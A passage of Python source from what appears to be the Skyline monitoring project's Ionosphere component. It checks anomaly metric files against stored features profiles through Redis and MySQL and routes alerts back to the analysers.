logger.info('metric variable - added_by - %s, now switching to analyzer to route alerts to analyzer, thanks analyzer_batch' % added_by)
added_by = 'analyzer'
logger.info('metric variable - added_by - %s, analyzer_batch checks will have alerts routed to analyzer' % added_by)
try:
# metric_vars.added_at
# added_at = str(metric_vars.added_at)
key = 'added_at'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_at = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_at - %s' % str(added_at))
except:
logger.error('error :: failed to read added_at variable from check file, setting to metric_timestamp - %s' % (metric_check_file))
added_at = metric_timestamp
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
full_duration = None
try:
# metric_vars.full_duration
# full_duration = str(metric_vars.full_duration)
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = None
ionosphere_parent_id_determined = False
try:
key = 'ionosphere_parent_id'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
ionosphere_parent_id = int(value_list[0])
ionosphere_parent_id_determined = True
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - ionosphere_parent_id - %s' % str(ionosphere_parent_id))
except:
logger.error('error :: failed to read ionosphere_parent_id variable from check file - %s' % (metric_check_file))
ionosphere_parent_id = None
if not ionosphere_parent_id_determined:
logger.error('error :: failed to determine ionosphere_parent_id variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @modified 20170116 - Feature #1854: Ionosphere learn
# Do not check the cache key or anomaly age if added by ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20170101 - Feature #1830: Ionosphere alerts
# Remove check file if an alert key exists
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
logger.info('no alert cache key - %s' % cache_key)
else:
logger.info('removing check - alert cache key exists - %s' % cache_key)
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Do not evaluate batch metrics against max_age_seconds
analyzer_batch_anomaly = None
if BATCH_PROCESSING:
# Is this a analyzer_batch related anomaly?
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric)
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('batch processing - not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if analyzer_batch_anomaly:
logger.info('batch anomaly not checking max_age_seconds for %s' % analyzer_batch_metric_anomaly_key)
else:
# @modified 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Wrapped in if analyzer_batch_anomaly
now = time()
anomaly_age = int(now) - int(metric_timestamp)
if anomaly_age > max_age_seconds:
logger.info(
'Ionosphere check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % (
metric, str(anomaly_age), str(max_age_seconds)))
with open(metric_check_file, 'rt') as fr:
metric_check_file_contents = fr.readlines()
logger.info(
'debug :: metric check file contents\n%s' % (str(metric_check_file_contents)))
self.remove_metric_check_file(str(metric_check_file))
return
else:
logger.info('processing check_file for ionosphere_learn - %s' % str(metric_check_file))
# @added 20161222 - ionosphere should extract features for every anomaly
# check that is sent through and calculate a feature_profile ready for
# submission by the user if they so choose. Further ionosphere could
# make itself more useful by comparing any training data profiles to
# further anomalies, however the feature profiles for subsequent
# anomalies may be similar enough to match a few times, with each one
# being a closer match to the next.
training_metric = False
metrics_id = None
metric_ionosphere_enabled = None
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available to determine all
# the details of all features profiles for the metric; this has all
# the generations values available in it. Here we go! Learn!
metrics_db_object = None
# @modified 20190325 - Feature #2484: FULL_DURATION feature profiles
# Moved get_metrics_db_object block to common_functions.py
try:
metrics_db_object = get_metrics_db_object(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine metrics_db_object from get_metrics_db_object for %s' % base_name)
if metrics_db_object:
metrics_id = None
try:
metrics_id = int(metrics_db_object['id'])
except:
# @added 20190509 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# Added a traceback here to debug an issue
logger.error(traceback.format_exc())
logger.error('error :: could not determine id from metrics_db_object for %s' % base_name)
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
if metrics_id:
# @modified 20190510 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# metric_ionosphere_enabled = int(metrics_db_object['ionosphere_enabled'])
metric_ionosphere_enabled = None
try:
metric_ionosphere_enabled = metrics_db_object['ionosphere_enabled']
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled from metrics_db_object for %s' % base_name)
if metric_ionosphere_enabled is not None:
training_metric = False
else:
training_metric = True
if metric_ionosphere_enabled == 1:
training_metric = False
if metric_ionosphere_enabled == 0:
training_metric = True
else:
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
logger.error('error :: could not determine metric id from memcache or metrics tables for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
# are feeding back is quite difficult to ascertain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
feedback_metric = False
if ionosphere_busy:
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
break
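# Illustrative example of the feedback namespace matching above, assuming
# SKYLINE_FEEDBACK_NAMESPACES contains a namespace such as 'skyline'
# (the actual contents are deployment specific):
#   base_name = 'skyline.analyzer.skyline-1.run_time'
#   'skyline' in base_name -> feedback_metric = True (substring match)
# Otherwise the namespace is split on '.' and all of its elements must be
# present in the metric namespace elements for the metric to be treated
# as a feedback metric.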
if feedback_metric:
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
logger.info('feedback metric identified adding Redis key with 600 TTL - %s' % cache_key)
try:
self.redis_conn.setex(cache_key, 600, int(time()))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s key to Redis' % (
str(cache_key)))
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is a match.
metric_max_generations = None
if added_by == 'ionosphere_learn':
try:
metric_max_generations = int(metrics_db_object['max_generations'])
logger.info('determining max_generations for ionosphere_learn check - %s - %s' % (str(metric_max_generations), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: ionosphere_learn check could not determine the metric max_generations from the metrics_db_object for %s' % base_name)
if not metric_max_generations:
logger.error('error :: ionosphere_learn check cannot continue without max_generations for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis ionosphere.ionosphere_non_smtp_alerter_metrics list is created here to
# replace the self.ionosphere_non_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere.ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only process smtp_alerter_metrics
if training_metric:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name in self.ionosphere_non_smtp_alerter_metrics:
if base_name in ionosphere_non_smtp_alerter_metrics:
# @modified 20191114 - Feature #: forward_alert
# Allow ionosphere to check any metrics that have an alerter other than smtp set, apart from syslog
# logger.error('error :: Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s' % (base_name))
logger.info('Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s which is a training_metric' % (base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.training_metrics.append(base_name)
redis_set = 'ionosphere.training_metrics'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
logger.info(
'ionosphere_enabled is %s for metric id %s - %s' % (
str(metric_ionosphere_enabled), str(metrics_id),
base_name))
if training_metric:
logger.info('Ionosphere is not enabled on %s' % (base_name))
else:
logger.info('Ionosphere is enabled on %s' % (base_name))
# @added 20161210 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Only continue if there is a training data json timeseries file
metric_timeseries_dir = base_name.replace('.', '/')
# @modified 20170115 - Feature #1854: Ionosphere learn
# Allowing the bifurcation of the metric_training_data_dir based on
# whether added_by is ionosphere_learn or not, this allows Ionosphere to
# be brought online to start evaluating the learn features profiles at
# 30 days or whatever the learn_full_duration_days is for the metric
# that is being automatically learnt uses these fuller duration features
# to determine if a new training data set has been created for an
# ionosphere_enabled metric. Here Ionosphere starts to try and get
# clever, let us hope not too clever, but this is where the
# max_percent_diff_from_origin and max_generations comes in. So ...
# here we go, a really "Crazy feedback loop" @astanway :) I would say
# that this is going to be way more useful than the last referenced one
# in https://github.com/etsy/skyline/pull/90#r13592782 ;) This is it
# 20170115202500 UTC Ionosphere really is now really going to begin.
# Here we go! Learn!
# metric_training_data_dir = '%s/%s/%s' % (
# settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
# metric_timeseries_dir)
if added_by != 'ionosphere_learn':
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
metric_timeseries_dir)
else:
# Here we go! Learn you bugger! SUCH A BIG THANKS TO tsfresh!
# And flowjob and The White Stripes, @matzhouse, her and the Dude.
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_LEARN_FOLDER, metric_timestamp,
metric_timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_training_data_dir, base_name)
if os.path.isfile(anomaly_json):
logger.info('training data ts json available - %s' % (anomaly_json))
else:
logger.error('error :: training data ts json was not found - %s' % (anomaly_json))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# The timeseries full_duration needs to be recorded to allow Mirage metrics to
# be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
if training_metric:
logger.info('training metric - %s' % (base_name))
redis_anomaly_json = False
if added_by == 'mirage':
logger.info('checking training data Redis json is available')
# Always calculate features for both the SECOND_ORDER_RESOLUTION_SECONDS
# timeseries data and the FULL_DURATION Redis timeseries data.
# It is always preferable to create a features profile on a FULL_DURATION
# data set, unless the user is flagging the actual Mirage timeseries as
# not anomalous. In the Mirage context the not anomalous may often be more
# "visibile" in the FULL_DURATION view and if so should be matched on the
# FULL_DURATION timeseries data, even if it is a Mirage metric.
# Features profiles can be created for a Mirage metric on both the
# FULL_DURATION and the SECOND_ORDER_RESOLUTION_SECONDS data sets, however
# only one should be needed.
# A features profile should always be created at the highest resolution
# possible, FULL_DURATION data, wherever possible.
try:
full_duration_hours = str(int(settings.FULL_DURATION / 3600))
redis_anomaly_json = '%s/%s.mirage.redis.%sh.json' % (metric_training_data_dir, base_name, full_duration_hours)
if os.path.isfile(redis_anomaly_json):
logger.info('training data Redis full duration ts json available - %s' % (redis_anomaly_json))
else:
logger.info('training data Redis full duration json was not found - %s' % (redis_anomaly_json))
except:
logger.error(traceback.format_exc())
logger.error('error :: training data Redis full duration json was not found - %s' % (redis_anomaly_json))
# @added 20161209 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Use SQLAlchemy, mysql.connector is still upstairs ^^ but starting the
# move to SQLAlchemy now that all the webapp Ionosphere SQLAlchemy
# patterns work and the database layout is defined we can begin on the
# data side. Ionosphere was put together backwards, like tsfresh was
# learnt. It was the people input first here in many ways, which is
# exactly how it was supposed to be.
# This is now the Ionosphere meat.
# Get a MySQL engine only if not training_metric
if not training_metric:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20170101 - Feature #1836: ionosphere - local features profiles disk cache
# Cache fp ids for 300 seconds?
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
logger.info('getting MySQL engine')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to get fp_ids')
if not engine:
logger.error('error :: engine not obtained to get fp_ids')
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_table meta for %s' % base_name)
# Determine the fp_ids that exist for the metric
fp_ids = []
fp_ids_found = False
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids so that we can handle multiple durations and not
# error and reminds me of the needed metrics by FULL_DURATION
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
all_fp_ids = []
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values available in it.
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = None
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly.
# Set result to None here to fix an interpolation error below
result = None
fp_layers_ids = []
fp_layers_present = False
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# After the features profile evaluations this fps_db_object will
# be used to determine what settings.FULL_DURATION features
# profiles need to be created for ionosphere_echo
fps_db_object = None
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# Set both fp_count_with_echo and fp_count to 0 initially so that
# if there are echo fps, then the database can be updated with the
# fp_count_with_echo value for fp_count in the ionosphere_matched
# table
fp_count = 0
fp_count_with_echo = 0
try:
connection = engine.connect()
# @modified 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# Order by the latest features profile, this also results in the
# layers ids being ordered by latest too.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id)
stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.id))
result = connection.execute(stmt)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# To be used for ionosphere_echo
fps_db_object = [{column: value for column, value in rowproxy.items()} for rowproxy in result]
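# Illustrative shape of fps_db_object as used below - a list of dicts,
# one per features profile row, keyed by the ionosphere table columns
# (values here are hypothetical):
#   [{'id': 123, 'enabled': 1, 'deleted': 0, 'full_duration': 604800,
#     'layers_id': 4, 'generation': 2, ...},
#    {'id': 97, 'enabled': 1, 'deleted': 0, 'full_duration': 86400,
#     'layers_id': 0, 'generation': 1, ...}]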
# for row in result:
for row in fps_db_object:
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
fp_id = row['id']
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly
fp_layers_id = int(row['layers_id'])
if fp_layers_id > 0:
fp_layers_present = True
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# Only add the fp_layers_id if > 0
# fp_layers_ids.append(fp_layers_id)
if fp_layers_id > 0:
if fp_layers_id not in fp_layers_ids:
fp_layers_ids.append(fp_layers_id)
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids
all_fp_ids.append(int(fp_id))
if int(row['full_duration']) == int(full_duration):
# @modified 20170116 - Feature #1854: Ionosphere learn - generations
# Handle ionosphere_learn
if added_by != 'ionosphere_learn':
fp_ids.append(int(fp_id))
logger.info('using fp id %s matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
else:
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it were to match. Ionosphere learn is
# limited here on generation.
# Set the default as max e.g. not allowed
current_fp_generation = int(metric_max_generations)
try:
current_fp_generation = row['generation']
if int(current_fp_generation) < int(metric_max_generations):
fp_ids.append(int(fp_id))
logger.info(
'valid ionosphere_learn generation %s - fp id %s matched full_duration %s - %s' % (
str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
else:
logger.info(
'ionosphere_learn cannot check due to max_generations of %s would be exceeded, current generation %s - fp id %s matched full_duration %s - %s' % (
str(metric_max_generations), str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: ionosphere_learn check could not determine the fp generation of fp id %s from the row object for %s' % (
str(fp_id), base_name))
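# Illustrative example of the generation limiting above (hypothetical
# values): with metric_max_generations = 5, a features profile at
# generation 3 is appended to fp_ids and can be checked and learnt from,
# whereas a features profile already at generation 5 is skipped because
# a match could not produce a new (6th generation) features profile.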
else:
# @modified 20200717 - Bug #3382: Prevent ionosphere.learn loop edge cases
# Added the fp full_duration for clarity sake
# logger.info('not using fp id %s not matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
logger.info('not using fp id %s of full_duration %s as does not match full_duration %s - %s' % (
str(fp_id), str(row['full_duration']), str(full_duration), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available throughout
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = row
connection.close()
fp_count = len(fp_ids)
logger.info('determined %s fp ids for %s' % (str(fp_count), base_name))
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = len(fp_layers_ids)
logger.info('determined %s layers ids for %s' % (str(fp_layers_count), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine fp ids from DB for %s' % base_name)
fp_count = 0
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = 0
# @added 20170306 - Feature #1960: ionosphere_layers
# Corrected the interpolation of the fp_ids_db_object above where it
# was set to the last row only, however it was not used anyway.
# Here we go, let us TEACH you properly. We only evaluate
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# if result:
# fp_ids_db_object = result
if len(fp_ids) == 0:
logger.info('there are no fp ids that match full duration for %s' % base_name)
# @added 20200908 - Feature #3734: waterfall alerts
# If any layers are found but any fps for analysis have been
# discarded because of echo rate limiting or they do not match
# the full duration, still check any enabled layers
if fp_layers_count:
logger.info('there are %s fp layers for %s' % (str(fp_layers_count), base_name))
fp_ids_found = True
else:
fp_ids_found = True
if not fp_ids_found:
logger.info('no fp ids were found for %s at %s' % (base_name, str(full_duration)))
# @modified 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Use all_fp_ids so that we can handle multiple durations
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if len(all_fp_ids) == 0:
logger.error('error :: Ionosphere is enabled on %s but has no feature_profiles' % (base_name))
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# If there are no features profiles enabled for the metric
# send it back to the source to alert and update the DB with
# ionosphere_enabled=0, it has been willy nillied, all its
# fps have been disabled. This has the ramification that
# any layers the metric has will be disabled as well
if added_by != 'ionosphere_learn':
logger.info('%s has been willy nillied, all its features profiles have been disabled, but it is still flagged as ionosphere_enabled' % (base_name))
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(cache_key, 300, str(cache_key_value))
# logger.info('added Redis alert key - %s - %s' % (
# cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# Update DB as to the fact that the metric is an ionosphere
# metric, all its fps have been disabled, it has been willy
# nillied
try:
metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('metrics_table OK')
connection = engine.connect()
connection.execute(
metrics_table.update(
metrics_table.c.id == metrics_id).
values(ionosphere_enabled=0))
connection.close()
logger.info('updated %s to ionosphere_enabled=0' % (
base_name))
logger.info('%s has been unwilly nillied' % (base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update ionosphere_enabled for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
else:
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20200930 - Feature #3734: waterfall alerts
# Send to Panorama as Mirage and Analyzer will not.
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
# @added 20161221 - TODO: why not calculate the features of every
# anomaly so that the user does not have to do it and wait for the
# features to be calculated.
# Check the features were calculated by the webapp
calculated_feature_file = '%s/%s.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
calculated_feature_file_found = False
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# ionosphere_learn should always provide the features profile csv
# Ionosphere does not create features profiles for learn, it only
# checks them.
# Here we go! Learn!
if added_by == 'ionosphere_learn':
if not calculated_feature_file_found:
logger.error('error :: no ionosphere_learn calculated_feature_file file found - %s' % calculated_feature_file)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
if training_metric:
# Allow time for the anomaly Graphite alert resources to be created, if
# they are not present then an alert was not sent and therefore features
# do not need to be calculated
check_time = int(time())
check_age = check_time - int(added_at)
if check_age < 5:
sleep(5)
graphite_file_count = len([f for f in os.listdir(metric_training_data_dir)
if f.endswith('.png') and
os.path.isfile(os.path.join(metric_training_data_dir, f))])
if graphite_file_count == 0:
logger.info('not calculating features - no anomaly Graphite alert resources created in %s' % (metric_training_data_dir))
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
else:
logger.info('anomaly Graphite alert resources found in %s' % (metric_training_data_dir))
context = skyline_app
f_calc = None
if not calculated_feature_file_found:
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
if f_calc:
send_metric_name = '%s.features_calculation_time' % skyline_app_graphite_namespace
f_calc_time = '%.2f' % float(f_calc)
try:
send_graphite_metric(skyline_app, send_metric_name, f_calc_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send the features calculation time metric')
if training_metric:
logger.info('training metric done')
# @added 20200908 -
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
# TODO: make ionosphere more useful, compare any other
# available training_metric profiles here and match, not in the
# db context, in the training context.
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
logger.error('error :: calculated features file not available - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20161213 - Branch #1790: test_tsfresh
# TODO: Match the test_tsfresh method
# Create an array of the calculated features
calculated_features = []
if calculated_feature_file_found:
calculated_features = get_calculated_features(calculated_feature_file)
if len(calculated_features) == 0:
logger.error('error :: no calculated features were determined from - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('%s calculated features determined' % (str(len(calculated_features))))
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked = 0
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = 0
layers_checked_count = 0
# @added 20190314 - Feature #2484: FULL_DURATION feature profiles
# Here we add the bifurcation to also create a features
# profile at FULL_DURATION for all Mirage metrics. With a
# view to increase the number of matches trained metric
# achieve by also allowing for the creation and comparing of
# the FULL_DURATION features profiles as well.
echo_check = False
echo_calculated_feature_file = False
echo_calculated_feature_file_found = False
echo_calculated_features = []
echo_fp_ids = []
echo_anomalous_timeseries = None
if added_by == 'mirage':
try:
echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
echo_enabled = False
if echo_enabled:
echo_check = True
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
# Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# In the batch processing context do not apply the alternation between
# normal Ionosphere Mirage features profile checks and Ionosphere echo
# features profile checks when ionosphere_busy is set to True as it
# results in false positives on batch processing metrics where one check
# matches and the next does not, then the next does.
batch_metric = False
if echo_check and BATCH_PROCESSING:
# Batch processing metric
try:
batch_metric = is_batch_metric(skyline_app, base_name)
except:
batch_metric = False
if batch_metric and ionosphere_busy:
ionosphere_busy = False
logger.info('batch processing metric, ionosphere_busy has been changed from True to False to prevent switching between Mirage and echo fps')
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 4 metric check files, alternate between normal
# Ionosphere Mirage features profile checks and Ionosphere echo features
# profile checks.
if echo_check:
if ionosphere_busy:
